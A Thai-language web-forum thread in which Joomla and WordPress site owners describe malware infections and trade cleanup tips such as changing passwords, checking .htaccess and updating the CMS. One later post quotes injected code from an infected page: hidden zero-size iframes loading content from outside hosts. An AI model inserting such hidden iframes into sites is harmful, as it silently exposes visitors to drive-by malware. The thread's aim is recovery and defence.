ThaiSEOBoard.com

พัฒนาเว็บไซต์ => CMS & Free Script => ข้อความที่เริ่มโดย: illusionto ที่ 07 กรกฎาคม 2012, 02:40:33



หัวข้อ: ใครใช้ Joomla อยู่ ช่วงนี้โดนมัลแวร์กันไหมครับ ผมโดนไป 3 เว็บ จุกเลย
เริ่มหัวข้อโดย: illusionto ที่ 07 กรกฎาคม 2012, 02:40:33
 :wanwan044: กำลังนั่งเซ็งอยู่เลยครับไม่คิดว่าจะโดนเองหลังจากที่เคยเห็นแต่เว็บคนอื่นเขาโดนกัน ส่วนใหญ่ ผมใช้ joomla เป็นหลัก มาวันนี้ joomla ป่วยติดไวรัส มัลแวร์เลย จากการประกาศเตือน ของอากู๋ก่อนหน้านี้ จากการแนะนำสำหรับเว็บที่ติดมัลแวร์ http://www.stopbadware.org/home/security เปิดเว็บตัวเองวันนี้โดนเลย ใครพอมีแนวทางการกำจัดไวรัส ทั้งในโฮส และเครื่องคอมพิวเตอร์ของเรา  :wanwan017: ช่วยผมทีนะคร้าบ เผื่อใครที่โดนแบบผมจะได้แก้ไขได้ทัน  :'( ครั้งแรกของการทำเว็บ  ขอบคุณคร้าบ


หัวข้อ: Re: ใครใช้ Joomla อยู่ ช่วงนี้โดนมัลแวร์กันไหมครับ ผมโดนไป 3 เว็บ จุกเลย
เริ่มหัวข้อโดย: ShizzK ที่ 07 กรกฎาคม 2012, 07:48:50
ของผมนะครับ โหลดไฟล์มาที่เครื่อง แล้วสแกนไวรัสดู ถ้าไม่มี

ให้เราสแกนเครื่องของเรา เปลี่ยนพาส ftp ไปหาไฟล์ที่ติดมัลแวร์ ส่วนใหญ่เวลาเข้าไปในไฟล์นั้นมันจะขึ้นว่าติดมัลแวร์

แสดงว่าไฟล์นั้นแหละตัวนำไวรัส ถ้าำไม่เจอไฟล์ไหนเลย

ก็ให้เราไปดูที่ htaccess ดูว่ามีการ refer หรือโยกย้ายหน้าโดเมนไปที่อื่นรึเปล่า หรือไปดูที่ google webmaster tools นะครับ

เขาจะบอกไ้ว้หมด


หัวข้อ: Re: ใครใช้ Joomla อยู่ ช่วงนี้โดนมัลแวร์กันไหมครับ ผมโดนไป 3 เว็บ จุกเลย
เริ่มหัวข้อโดย: illusionto ที่ 07 กรกฎาคม 2012, 15:38:33
ของผมนะครับ โหลดไฟล์มาที่เครื่อง แล้วสแกนไวรัสดู ถ้าไม่มี

ให้เราสแกนเครื่องของเรา เปลี่ยนพาส ftp ไปหาไฟล์ที่ติดมัลแวร์ ส่วนใหญ่เวลาเข้าไปในไฟล์นั้นมันจะขึ้นว่าติดมัลแวร์

แสดงว่าไฟล์นั้นแหละตัวนำไวรัส ถ้าำไม่เจอไฟล์ไหนเลย

ก็ให้เราไปดูที่ htaccess ดูว่ามีการ refer หรือโยกย้ายหน้าโดเมนไปที่อื่นรึเปล่า หรือไปดูที่ google webmaster tools นะครับ

เขาจะบอกไ้ว้หมด

ขอบคุณมากเลยครับ ครั้งแรกเลยที่โดน เวลาเข้าระบบ admin หรือ host ทีก็กลัวๆอยู่ว่าถ้าเข้าไปดำเนินการต่อ จะติดไวรัสมัลแวร์เพิ่มอีกไหม ทำให้ล่าช้าในการแก้ไวรัสครับ


หัวข้อ: Re: ใครใช้ Joomla อยู่ ช่วงนี้โดนมัลแวร์กันไหมครับ ผมโดนไป 3 เว็บ จุกเลย
เริ่มหัวข้อโดย: Bes ที่ 07 กรกฎาคม 2012, 23:30:32
ระวังเรื่องการ Chmod 777 ให้เฉพาะที่ Joomla ต้องการก็พอ มากกว่านั้นจะมีปัญหาได้


หัวข้อ: Re: ใครใช้ Joomla อยู่ ช่วงนี้โดนมัลแวร์กันไหมครับ ผมโดนไป 3 เว็บ จุกเลย
เริ่มหัวข้อโดย: smapan ที่ 13 กรกฎาคม 2012, 10:49:09
เบื้องต้นสุดๆของการรักษาความปลอดภัย คืออัพเดต version ให้ล่าสุดเสมอ ครับ


หัวข้อ: Re: ใครใช้ Joomla อยู่ ช่วงนี้โดนมัลแวร์กันไหมครับ ผมโดนไป 3 เว็บ จุกเลย
เริ่มหัวข้อโดย: Freedomlover ที่ 13 กรกฎาคม 2012, 10:54:27
เบื้องต้นสุดๆของการรักษาความปลอดภัย คืออัพเดต version ให้ล่าสุดเสมอ ครับ

แนะนำตามนี้ครับ


หัวข้อ: Re: ใครใช้ Joomla อยู่ ช่วงนี้โดนมัลแวร์กันไหมครับ ผมโดนไป 3 เว็บ จุกเลย
เริ่มหัวข้อโดย: CMSHostThailand ที่ 13 กรกฎาคม 2012, 12:09:19
Male Ware InJection

วิธีแก้ไข redirect to minkof.sellclassics.com
http://www.cmshostthailand.com/support/knowledgebase.php?action=displayarticle&id=518

Case By Customer


หัวข้อ: Re: ใครใช้ Joomla อยู่ ช่วงนี้โดนมัลแวร์กันไหมครับ ผมโดนไป 3 เว็บ จุกเลย
เริ่มหัวข้อโดย: binknon7 ที่ 13 กรกฎาคม 2012, 13:16:38
ผมยังไม่โดนนะ  :wanwan017:


หัวข้อ: Re: ใครใช้ Joomla อยู่ ช่วงนี้โดนมัลแวร์กันไหมครับ ผมโดนไป 3 เว็บ จุกเลย
เริ่มหัวข้อโดย: iamscreener ที่ 13 กรกฎาคม 2012, 13:19:25
:wanwan044: กำลังนั่งเซ็งอยู่เลยครับไม่คิดว่าจะโดนเองหลังจากที่เคยเห็นแต่เว็บคนอื่นเขาโดนกัน ส่วนใหญ่ ผมใช้ joomla เป็นหลัก มาวันนี้ joomla ป่วยติดไวรัส มัลแวร์เลย จากการประกาศเตือน ของอากู๋ก่อนหน้านี้ จากการแนะนำสำหรับเว็บที่ติดมัลแวร์ [url]http://www.stopbadware.org/home/security[/url] เปิดเว็บตัวเองวันนี้โดนเลย ใครพอมีแนวทางการกำจัดไวรัส ทั้งในโฮส และเครื่องคอมพิวเตอร์ของเรา  :wanwan017: ช่วยผมทีนะคร้าบ เผื่อใครที่โดนแบบผมจะได้แก้ไขได้ทัน  :'( ครั้งแรกของการทำเว็บ  ขอบคุณคร้าบ

ผมก็เพิ่งโดนไปครับ เป็นกำลังใจให้ครับ


หัวข้อ: Re: ใครใช้ Joomla อยู่ ช่วงนี้โดนมัลแวร์กันไหมครับ ผมโดนไป 3 เว็บ จุกเลย
เริ่มหัวข้อโดย: denzicrew ที่ 17 กรกฎาคม 2012, 10:31:04
หลังจากเว็บพังเพราะไปอัพเดทไม่สำเร็จ ต่อมาเจอแฮค และพึ่งมาโดนมัลแวร์จบไป ... รู้สึกว่าตัวเองรู้ขึ้นเยอะกว่าเดิม แต่ก็แอบท้อ ตอนนี้พยายามหาวิธีอัพเดทเวอร์ชั่นจูมล่าใหม่ หรือจะเปลี่ยนไปส้ราง WP ก็ยังคิดไม่ออก ใครมีวิธีอัพเดทแบบที่จะไม่ทำให้เวบพังบ้างมั้ยคะ


หัวข้อ: Re: ใครใช้ Joomla อยู่ ช่วงนี้โดนมัลแวร์กันไหมครับ ผมโดนไป 3 เว็บ จุกเลย
เริ่มหัวข้อโดย: smapan ที่ 17 กรกฎาคม 2012, 10:38:02
หลังจากเว็บพังเพราะไปอัพเดทไม่สำเร็จ ต่อมาเจอแฮค และพึ่งมาโดนมัลแวร์จบไป ... รู้สึกว่าตัวเองรู้ขึ้นเยอะกว่าเดิม แต่ก็แอบท้อ ตอนนี้พยายามหาวิธีอัพเดทเวอร์ชั่นจูมล่าใหม่ หรือจะเปลี่ยนไปส้ราง WP ก็ยังคิดไม่ออก ใครมีวิธีอัพเดทแบบที่จะไม่ทำให้เวบพังบ้างมั้ยคะ

อัพเดต ตรงไหนครับที่พัง และ พังยังไงครับ


หัวข้อ: Re: ใครใช้ Joomla อยู่ ช่วงนี้โดนมัลแวร์กันไหมครับ ผมโดนไป 3 เว็บ จุกเลย
เริ่มหัวข้อโดย: dramaseo ที่ 17 กรกฎาคม 2012, 10:40:17
หลังจากเว็บพังเพราะไปอัพเดทไม่สำเร็จ ต่อมาเจอแฮค และพึ่งมาโดนมัลแวร์จบไป ... รู้สึกว่าตัวเองรู้ขึ้นเยอะกว่าเดิม แต่ก็แอบท้อ ตอนนี้พยายามหาวิธีอัพเดทเวอร์ชั่นจูมล่าใหม่ หรือจะเปลี่ยนไปส้ราง WP ก็ยังคิดไม่ออก ใครมีวิธีอัพเดทแบบที่จะไม่ทำให้เวบพังบ้างมั้ยคะ

ก่อนอัพเดทผมจะแบคอัพไว้ก่อนเสมอ แล้วอัพเดทแบบเมนวลคือโยนไฟล์อัพเดทเข้าไปแทนทีเดิมใน FTP ซึ่งจริงๆหลังเว็บมีให้อัพเดทแบบออโต้นะ แต่ช้าๆอึดอัพเลยใช้แบบเมนวลแทน และไม่เคยพบว่าเว็บพังเลยนะ ต้องดูเวอร์ชั่นอัพเดทให้ตรงด้วย เช่นอัพจาก 2.5.4 ไป 2.5.6 ก็ต้องหาไฟล์เฉพาะของมัน


หัวข้อ: Re: ใครใช้ Joomla อยู่ ช่วงนี้โดนมัลแวร์กันไหมครับ ผมโดนไป 3 เว็บ จุกเลย
เริ่มหัวข้อโดย: jupiterjan ที่ 17 กรกฎาคม 2012, 10:45:21
ใช้ template nulled หรือปล่าวครับ กำลัง จะใช้ joomla


หัวข้อ: Re: ใครใช้ Joomla อยู่ ช่วงนี้โดนมัลแวร์กันไหมครับ ผมโดนไป 3 เว็บ จุกเลย
เริ่มหัวข้อโดย: dramaseo ที่ 17 กรกฎาคม 2012, 10:50:16
อีกอย่างพวกเทมเพลตมาตรฐานที่แถมมาให้ ถ้าเราโมด้วยเทมเพลตเหล่านี้มันจะอัพเดทด้วย ต้องแบคอัพไฟล์เทมเพลตไว้ก่อน แล้วค่อยเอาไปทับหลังอัพเดท


หัวข้อ: Re: ใครใช้ Joomla อยู่ ช่วงนี้โดนมัลแวร์กันไหมครับ ผมโดนไป 3 เว็บ จุกเลย
เริ่มหัวข้อโดย: denzicrew ที่ 17 กรกฎาคม 2012, 11:11:35
หลังจากเว็บพังเพราะไปอัพเดทไม่สำเร็จ ต่อมาเจอแฮค และพึ่งมาโดนมัลแวร์จบไป ... รู้สึกว่าตัวเองรู้ขึ้นเยอะกว่าเดิม แต่ก็แอบท้อ ตอนนี้พยายามหาวิธีอัพเดทเวอร์ชั่นจูมล่าใหม่ หรือจะเปลี่ยนไปส้ราง WP ก็ยังคิดไม่ออก ใครมีวิธีอัพเดทแบบที่จะไม่ทำให้เวบพังบ้างมั้ยคะ

ก่อนอัพเดทผมจะแบคอัพไว้ก่อนเสมอ แล้วอัพเดทแบบเมนวลคือโยนไฟล์อัพเดทเข้าไปแทนทีเดิมใน FTP ซึ่งจริงๆหลังเว็บมีให้อัพเดทแบบออโต้นะ แต่ช้าๆอึดอัพเลยใช้แบบเมนวลแทน และไม่เคยพบว่าเว็บพังเลยนะ ต้องดูเวอร์ชั่นอัพเดทให้ตรงด้วย เช่นอัพจาก 2.5.4 ไป 2.5.6 ก็ต้องหาไฟล์เฉพาะของมัน

อัพจาก 1.5 ไป 2.5 ค่ะ เลยพัง (จริงๆมันก็สมควรใช่มั้ยล่ะ )


หัวข้อ: Re: ใครใช้ Joomla อยู่ ช่วงนี้โดนมัลแวร์กันไหมครับ ผมโดนไป 3 เว็บ จุกเลย
เริ่มหัวข้อโดย: siamlivehost ที่ 17 กรกฎาคม 2012, 11:23:48
ของลูกค้าผม ส่วนมากจะพรุนจาก template เถื่อนที่โหลดมาใช้กัน


หัวข้อ: Re: ใครใช้ Joomla อยู่ ช่วงนี้โดนมัลแวร์กันไหมครับ ผมโดนไป 3 เว็บ จุกเลย
เริ่มหัวข้อโดย: eyourhand ที่ 17 กรกฎาคม 2012, 11:38:03
เว็บผมก็โดนครับ เป็น WP

เบื้องต้นให้รีบทันทีคือ
- เปลี่ยน Pwd: FTP , Backend ต่างๆ ก่อน
- ปรับ CMOD : เป็นระดับ 644 , 444 (index.php)
- สแกนไวรัส ที่เครื่องตัวเองครับ
- ใช้ FileZilla ในการอัฟโหลด และล้าง pwd การ login เข้า ทุกครั้ง

ส่วนต่อมา
- Google webmaster tool ก็สมัครเพื่อให้เห็นปัญหาครับ
ยังไงปรึกษา ทาง PM ได้ครับ  :wanwan017:


หัวข้อ: Re: ใครใช้ Joomla อยู่ ช่วงนี้โดนมัลแวร์กันไหมครับ ผมโดนไป 3 เว็บ จุกเลย
เริ่มหัวข้อโดย: fungi456 ที่ 17 กรกฎาคม 2012, 11:38:10
4 เว็บ โดนทั้ง Joomla และ SMF ตอนนี้แก้ไขเรียบร้อยหมดแล้ว แต่ก็ยังแอบหวั่นใจอยู่ ช่วงนี้ต้องระวังมากๆ ชุมกว่าหวัดนกอีก


หัวข้อ: Re: ใครใช้ Joomla อยู่ ช่วงนี้โดนมัลแวร์กันไหมครับ ผมโดนไป 3 เว็บ จุกเลย
เริ่มหัวข้อโดย: greennud ที่ 02 พฤศจิกายน 2013, 11:02:34
รบกวนสอบถามครับ ว่า

เมื่อเราเข้าไปที่หน้า url http://www.abc.com/index.php/visa
 
เมื่อเราดูจาก code จาก page source แล้วพบว่าพบ code ที่โดนแทรก code อย่างนี้

=====================================

<iframe onload="iFrameHeight()"   id="blockrandom"
   name=""
   src="http://88.198.219.85"
   width="1"
   height="1"
   scrolling="auto"
   align="top"
   frameborder="0"
   class="wrapper">
   No Iframes</iframe>
 ?>
</body><iframe src="http://www.emkbiyomedikal.com.tr/tmp/ini.php"  width="0" height="0" frameborder="0"></iframe>

=====================================

หากผมต้องการเข้าไปลบออก ต้องไปลบที่ไฟล์ไหนครับ
ขอบคุณมากครับ



หัวข้อ: Re: ใครใช้ Joomla อยู่ ช่วงนี้โดนมัลแวร์กันไหมครับ ผมโดนไป 3 เว็บ จุกเลย
เริ่มหัวข้อโดย: phpwin ที่ 02 พฤศจิกายน 2013, 11:26:37
ระวังเรื่องการ Chmod 777 ให้เฉพาะที่ Joomla ต้องการก็พอ มากกว่านั้นจะมีปัญหาได้

ตามความคิดเห็นนี้ครับ 777 เฉพาะการอัพโหลดรูปหรือไฟล์ก็พอครับ แล้วเขียน .htaccess ดักในโฟลเดอร์นั้นอีกทีว่า ให้อัพโหลดไฟล์นามสกุลอะไรได้บ้าง
แนะนำให้อัพเกรดเป็นเวอร์ชั่นล่าสุดครับ ตอนนี้ผมใช้ Joomla 2.5.14 อยู่ครับ
โค๊ด:
http://www.joomlacorner.com/joomla-news/829-joomla-2-5-14-released.html


หัวข้อ: Re: ใครใช้ Joomla อยู่ ช่วงนี้โดนมัลแวร์กันไหมครับ ผมโดนไป 3 เว็บ จุกเลย
เริ่มหัวข้อโดย: sys2528 ที่ 02 พฤศจิกายน 2013, 11:32:15
เท่าที่รู้ Joomla เจอบ่อยมาก ๆ ครับ เมื่อก่อนเพื่อนที่ทำงานก็เจอบ่อย แต่ไม่ได้ถามเรื่องการแก้ไขจุดนี้ น่าจะประมาณว่า หาสคริปที่แทรกเข้าไปที่โค้ด อัพลงมาเพื่อ Scan แล้วเปลี่ยน Pass แล้วอัพขึ้นไปใหม่  การฝังสคริป เป็นต้น ลองดูครับ มัน่ากลัวซะจริง ๆ เลย ทำให้ผมไม่ๆได้แตะต้อง Joomla นานเลยครับ ช่วงนี้ก็ดู WP กับ Coding เองเลยครับ